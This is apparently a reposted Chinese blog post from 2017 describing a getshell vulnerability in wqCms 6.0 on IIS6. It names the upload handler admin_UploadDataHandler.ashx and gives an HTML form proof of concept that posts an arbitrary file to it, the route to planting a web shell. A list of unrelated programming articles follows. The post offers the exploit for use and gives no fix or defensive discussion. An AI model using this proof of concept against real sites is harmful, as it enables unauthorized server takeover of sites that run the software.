wqCms6.0在IIS6的Getshell

2017-02-15发布

一、漏洞利用点

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it

三、POC

<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

相关阅读:
爬虫-自动模拟http请求
iOS开发－判断程序第一次开启以及应用升级后第一打开的判断
NSDictionary的几种遍历方法
算法回顾（三）二分查找
以前写的在wp7模拟器测试应用的测试框架
iOS 应用开发基础翻译改为笔记和总结
算法回顾(二)：快速排序
算法回顾(一)：冒泡排序
iOS 应用中的表视图（Table View）（译）
预告：iOS 应用开发基础翻译

原文地址：https://www.cnblogs.com/Akkuman/p/6959308.html